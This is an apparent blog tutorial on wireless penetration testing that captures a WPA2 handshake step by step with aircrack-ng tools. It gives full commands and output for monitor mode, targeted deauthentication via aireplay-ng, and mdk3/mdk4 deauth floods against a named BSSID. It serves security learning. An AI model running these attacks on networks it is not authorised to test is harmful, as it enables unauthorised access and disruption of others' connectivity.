Table of Contents

Wireless Penetration Testing

Introduction

It has been 122 years since Nicola Tesla amazed the crowd at New York's Madison Square Garden, with a wirelessly operated boat which listened to commands coming out of thin air. Back in 1898, when even electricity alone seemed like magic to unaccustomed spectator, mysterious genius must have looked like a dark sorcerer of a kind, while remotely operating his little boat.

If there is an ability that stands out of Mr. Tesla’s bag of tricks, it is definitely the ability to be grossly ahead of its time, this is where he always shined the most - so it took humanity more than half a century to get in sync with his tune, but alright, as they say - better late than never.

Today, wireless technologies he introduced us to, play a central role in all our devices, we are integrating connectivity not just into smartphones, but also into self-driven cars, air-conditioning systems, refrigerators, electrical ovens, we even coined the term smart-homes for IOT connected houses!

The ability to connect devices without physical access to them, also makes it hard to control who has that access. In this tutorial, we will go through various methods of gaining access to protected wireless networks, which will give you the needed know-how that will help you to set up your wireless environment as secure as possible.

Due to the open nature of Linux, there are loads of ready made Linux distributions out there, whose sole purpose is penetration testing, and among them there are a few specialized in wireless field.

One of the most feature rich among them is spanish WifiSlax (it has English version builtin), based on Slackware Linux. It’s gentle learning curve makes it the best choice for those with no experience in this field, and it’s easy to use KDE graphical interface is something that newcomers from Windows world will definitely know how to appreciate. It contains loads of tools such as: Wifite, Handshaker, Cowpatty, Pyrit, Fern Wifi Cracker, Bully, PixieScript, Hashcat and so on, which make the whole process of capturing and cracking handshakes and PMKID’s a matter of a few clicks. Arm it with a good wordlist and it will get you going in no time. If this sounds intriguing enough for you, download it from their website, put it onto large enough USB flash stick (2 GB or larger) with Rufus, and you’ll start in no time.

Ex Backtrack, or todays Kali Linux as usual also has you covered with it’s wireless tools section. Offensive Security, people behind Kali Linux, are doing their best to keep Kali a sort of standard for everything related to penetration testing, and wireless is no exception.

In this tutorial, we will however concentrate on the manual way, because knowing how things actually work under the hood will give you an enormous advantage in the future. Any Linux distribution with aircrack and Hashcat will do, but we will get to that part later on.

WPA2 Networks Cracking

WPA2 (Wi-Fi Protected Access) protocol, based on the IEEE 802.11i data encryption technology standard, is developed by Wi-Fi Alliance, the non-profit organization that promotes Wi-Fi technology and certifies Wi-Fi products. It is in wide use since 2006 and is here to stay until WPA3 replaces it in the future.

4-Way-Handshake Cracking Method

Still the most widely used way to crack a WPA/WPA2 network is by cracking a captured 4-way-handshake, which you take while your wireless card is in monitoring mode. To get into this mode, airmon-ng application is used (airmon-ng is a part of the aircrack-ng collection). Once the handshake is captured, Hashcat application is used, together with a good wordlist, to crack the password. Hashcat is an awesome application which uses the power of the GPU (it can use CPU as well) to crack the password.

Summarization of this method:

  1. Wireless card is put into monitoring mode, which enables it to listen to all wireless communication, instead of just communicating with the associated access point
  2. Surrounding wireless communication is monitored and exchanged 4-way-handshakes are captured. To speed things up, aireplay-ng or MDK3/4 attacks can be used to disassociate existing clients from their access points, forcing them to authenticate again, so we can capture the handshake
  3. Good wordlists are picked from the Internet or generated with various software applications such as Crunch
  4. Handshakes are then most often cracked with Hashcat or cracked with aircrack-ng application

So, to begin, we will first install Aircrack-ng. Aircrack is a whole suite of applications, intended for wireless networks cracking, developed by Thomas d'Otreppe de Bouvette.

As good old Wikipedia says: Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs..

How to install Aircrack From Source On Linux

As written on the developers website, you can install aircrack-ng from source, by doing the following:

wget https://download.aircrack-ng.org/aircrack-ng-1.5.2.tar.gz
tar -zxvf aircrack-ng-1.5.2.tar.gz
cd aircrack-ng-1.5.2
autoreconf -i
./configure --with-experimental
make
make install
ldconfig

This will download the latest version of the software and install it with all it’s features.

How to install aircrack using Linux package manager

Of course, you can also use your distribution's package manager to download and install Aircrack, but doing it that way doesn’t guarantee you have all it’s latest features.

On Debian based systems you can install it with a simple:

sudo apt install aircrack-ng

How to find name of wireless adapter on Linux

Once we have Aircrack installed, it is time to put our wireless card into monitoring mode. Aircrack uses airmon-ng application for this, but first we need to know the exact name of our wireless adapter, and we also need to kill all potentially conflicting processes. We can find the name of the card with:

sudo iwconfig

output:
histerix@box:~$ sudo iwconfig
wlp12s0 Mode:Managed Frequency:2.462 GHz    
           Retry short limit:7  RTS thr:off  Fragment thr:off
           Encryption key:off
           Power Management:off
           Link Quality=70/70 Signal level=-37 dBm 
           Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
           Tx excessive retries:0 Invalid misc:63  Missed beacon:0
lo       no wireless extensions.
enp9s0 no wireless extensions.

As we can see, our wireless card is called wlp12s0. What we need to do now is to stop the processes that may interfere with our work, by issuing:

sudo airmon-ng check kill

Output:
[email protected]:~$ sudo airmon-ng check kill
Killing these processes:
PID Name
863 wpa_supplicant

We can now safely proceed by issuing the following command:

sudo airmon-ng start wlp12s0

output:
[email protected]:~$ sudo airmon-ng start wlp12s0
PHY   Interface   Driver   Chipset
phy0   wlp12s0mon   ath9k   Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

Finally, our card is in monitoring mode, it is now called wlp12s0mon, and it’s time to capture some handshakes. Run just airodump first to check on which channel is the network we want to crack, by issuing the following command:

sudo airodump-ng wlp12s0mon 

output:
[email protected]:~/Desktop/captures$ sudo airodump-ng wlp12s0mon
CH 8 ][ Elapsed: 6 s ][ 2020-01-19 22:18                                               
BSSID                            PWR Beacons              #Data, #/s CH MB  ENC CIPHER AUTH ESSID
0c:9a:54:0b:b2:e5 -29                 40             576           42  6 130 WPA2 CCMP  PSK ad1b70                                                      
D8:97:BA:44:17:40 -70                8                0                 0  1 130 WPA2 CCMP  PSK Tamara                                                                                   
0E:54:A5:38:8C:82 -74                 46             0                 0  6 130 WPA2 CCMP  MGT UniFi                                                                                    
0C:54:A5:38:8C:80 -73                 48             52              24  6 130 WPA2 CCMP  PSK Pizza Net                                                             
DA:97:BA:44:17:42 -71                8                0                 0  1 130 WPA2 CCMP  MGT UniFi                                                                                    
5C:76:95:80:57:21 -75                 6                0                 0  1 130 WPA2 CCMP  PSK Kiki                                                                                     
74:40:BB:A2:D3:E5 -74                23             0                 0  6 130 WPA2 CCMP  PSK A2D3DF                                                                                   
B4:2A:0E:6B:1D:E9 -76                5                0                 0  1 130 WPA2 CCMP  PSK Timmy                                                                                    
D6:5D:DF:12:9B:21 -72                1                0                 0  9 130 WPA2 CCMP  MGT UniFi                                                                                     
7C:05:07:63:4C:FF -77                 1                0                 0  1 130 WPA2 CCMP  PSK e55dd8                                                                                   
10:05:01:4E:B8:BC -75                 2                0                 0 11 130 WPA2 CCMP  PSK Splicmen                                                                                 
34:69:87:BE:AB:8D -76                5                2                 0 13 130 WPA2 CCMP  PSK ZTE_BEAB8D                                                            
76:40:BB:A2:D2:E6 -74                34             0                 0  6 130 WPA2 CCMP  MGT UniFi                                                                                    
04:D9:F5:22:F9:81 -80                 3                0                 0 10 360 WPA2 CCMP  PSK  Medici                                                                                    
20:E8:82:B0:DD:56 -80                3                0                 0  4 130 WPA2 CCMP  PSK ZTE_H168NB0DD56                                                       
72:54:D2:C7:33:E6 -81                 3                0                 0  2 130 WPA2 CCMP  MGT UniFi                                                                                     
34:DA:B7:B0:64:1B -81                2                0                 0  3 130 WPA2 CCMP  PSK ZTE_H168NB0641B                                                       
4A:5F:99:39:20:40 -86                 19             0                 0  6 130 WPA2 CCMP  MGT UniFi                                                                                

In this tutorial, we will try to capture the handshake of ad1b70 network, whose BSSID is 0c:9a:54:0b:b2:e5.

As can be seen in the output above, this network is on channel number 6, so this is the channel we will monitor.

We will now run the same command again, this time adding the channel number, BSSID of the network we are attacking, and the path where we want airodump to save the captures:

sudo airodump-ng -c 6 --bssid 0c:9a:54:0b:b2:e5 -w /home/histerix/captures wlp12s0mon

output: 
[email protected]:~$ sudo airodump-ng -c 6 --bssid 0c:9a:54:0b:b2:e5 -w /home/histerix/captures wlp12s0mon
CH 6 ][ Elapsed: 1 min ][ 2020-01-19 22:33 ]      

BSSID                    PWR RXQ Beacons            #Data, #/s CH MB  ENC CIPHER AUTH ESSID
0c:9a:54:0b:b2:e5 -52 62              711        1192     1  6 130 WPA2 CCMP  PSK ad1b70  

BSSID                   STATION      PWR  Rate    Lost       Frames Probe
0c:9a:54:0b:b2:e5 0C:FF:8A:23:B7:0F -44   0e- 1     0           916
0c:9a:54:0b:b2:e5 50:C8:E5:DA:7B:F1 -88  0e- 1  19492       2942

Do not close the terminal window, leave it running and open a new terminal window or a new terminal tab.

In this window, we will de-authenticate existing clients with the help of aireplay tool.

For this we need the MAC address of at least one connected client, which we can find in the previous terminal window.

As we can see at the bottom there, there are two clients connected to the access point, with MAC addresses 50:C8:E5:DA:7B:F1 and 0C:FF:8A:23:B7:0F.

We will pick one and issue the following command:

sudo aireplay-ng -0 5 -a 0c:9a:54:0b:b2:e5 -c 0C:FF:8A:23:B7:0F  wlp12s0mon

This will send de-authentication command five consecutive times, and will try to kick the client with MAC address 0C:FF:8A:23:B7:0F from the access point on 0c:9a:54:0b:b2:e5.

output:

[email protected]:~$ sudo aireplay-ng -0 5 -a 0c:9a:54:0b:b2:e5 -c 0C:FF:8A:23:B7:0F  wlp12s0mon
22:31:59 Waiting for beacon frame (BSSID: 0c:9a:54:0b:b2:e5) on channel 6
22:32:00 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 9|66 ACKs]
22:32:00 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 5|56 ACKs]
22:32:01 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [10|68 ACKs]
22:32:02 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 0|62 ACKs]
22:32:02 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [54|66 ACKs]

If we succeed, at the top right side of the first terminal window we should receive the good news:

CH 6 ][ Elapsed: 1 min ][ 2020-01-19 22:53 ][ WPA handshake: 0c:9a:54:0b:b2:e5   

BSSID              PWR RXQ Beacons    #Data, #/s CH MB  ENC CIPHER AUTH ESSID 
0c:9a:54:0b:b2:e5 -42 74    614    365     1  6 130 WPA2 CCMP  PSK ad1b70
BSSID              STATION        PWR  Rate     Lost    Frames Probe
0c:9a:54:0b:b2:e5 0C:FF:8A:23:B7:0F -32   0e- 1  0         1665 
0c:9a:54:0b:b2:e5 50:C8:E5:DA:7B:F1 -77   0e- 1  26712  1347 

If nothing happens, wait half a minute and repeat the same command. Doing this a couple of times should disconnect the client from the access point, if we are close enough and the signal is decent.

Apart from de-authentication with aireplay, you can also try to use MDK3/MDK4 attack in the third window. MDK is an excellent little software which sends both de-authentication and de-association and can in some situations be more efficient than aireplay.

You can install it easily from your software repository, with:

sudo apt-get install mdk4

There are several ways you can use MDK in a scenario such as ours.

You could just use a one-liner such as this one with MDK4:

[email protected]:~$ mdk4 wlp12s0mon b -a 0c:9a:54:0b:b2:e5

or you can create a simple text file with MAC addresses of several access points and hit them all at once. Name this file any way you want (for example targets.txt) and then run it like this:

[email protected]:~$ mdk3 wlp12s0mon d b targets.txt -c 6

Do not get confused with the lack of output, MDK is doing it’s thing in the background, quietly but effectively, so just leave the window open and go back to the first terminal window and watch the situation unfolds.

You will see that suddenly there are many new, fake clients trying to connect to the access point, in an attempt to knock it down, forcing all clients to reconnect.

MDK attack works bit slower than aireplay, but in a few minutes you should see the results. Please also note that the access point might suddenly change the channel it uses, and in that case adjust your airodump and MDK commands, restarting them on the new channel, keeping the dump running all the time. There are certain small differences between version 3 and 4 so just check them by appending --help, it is nicely documented and you’ll be up and running quickly.

So we got the handshake! What now?

Part 2 - Cracking Wireless Networks With Kali

Related Topics:

How to install Naxsi Firewall with Nginx

How to install openVAS on Ubuntu

Related Posts

1